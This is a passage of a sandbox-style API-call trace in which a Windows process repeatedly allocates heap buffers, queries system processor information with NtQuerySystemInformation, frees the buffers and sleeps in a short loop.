dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0303.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0303.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0303.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0303.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0303.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.459] Sleep (dwMilliseconds=0x110) [0303.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0303.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0303.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0303.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0303.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0303.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0303.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0303.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0303.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.470] Sleep (dwMilliseconds=0x110) [0303.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0303.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0303.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0303.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0303.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0303.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0303.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0303.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0303.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.489] Sleep (dwMilliseconds=0x110) [0303.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0303.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0303.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0303.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0303.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0303.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0303.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0303.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0303.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.506] Sleep (dwMilliseconds=0x110) [0303.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0303.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0303.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0303.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0303.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0303.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0303.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0303.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0303.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.520] Sleep (dwMilliseconds=0x110) [0303.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0303.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0303.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0303.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0303.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0303.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0303.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0303.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0303.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.536] Sleep (dwMilliseconds=0x110) [0303.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0303.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0303.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0303.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0303.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0303.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0303.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0303.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0303.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.547] Sleep (dwMilliseconds=0x110) [0303.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0303.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0303.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0303.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0303.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0303.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0303.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0303.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0303.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.567] Sleep (dwMilliseconds=0x110) [0303.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0303.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0303.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0303.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0303.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0303.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0303.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0303.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0303.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.584] Sleep (dwMilliseconds=0x110) [0303.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0303.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0303.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0303.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0303.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0303.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0303.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0303.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0303.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.597] Sleep (dwMilliseconds=0x110) [0303.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0303.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0303.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0303.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0303.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0303.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0303.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0303.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0303.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.611] Sleep (dwMilliseconds=0x110) [0303.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0303.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0303.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0303.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0303.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0303.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0303.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0303.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0303.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.630] Sleep (dwMilliseconds=0x110) [0303.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0303.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0303.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0303.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0303.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0303.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0303.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0303.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0303.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.645] Sleep (dwMilliseconds=0x110) [0303.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0303.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0303.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0303.668] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0303.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0303.668] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0303.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0303.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0303.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.670] Sleep (dwMilliseconds=0x110) [0303.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0303.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0303.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0303.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: 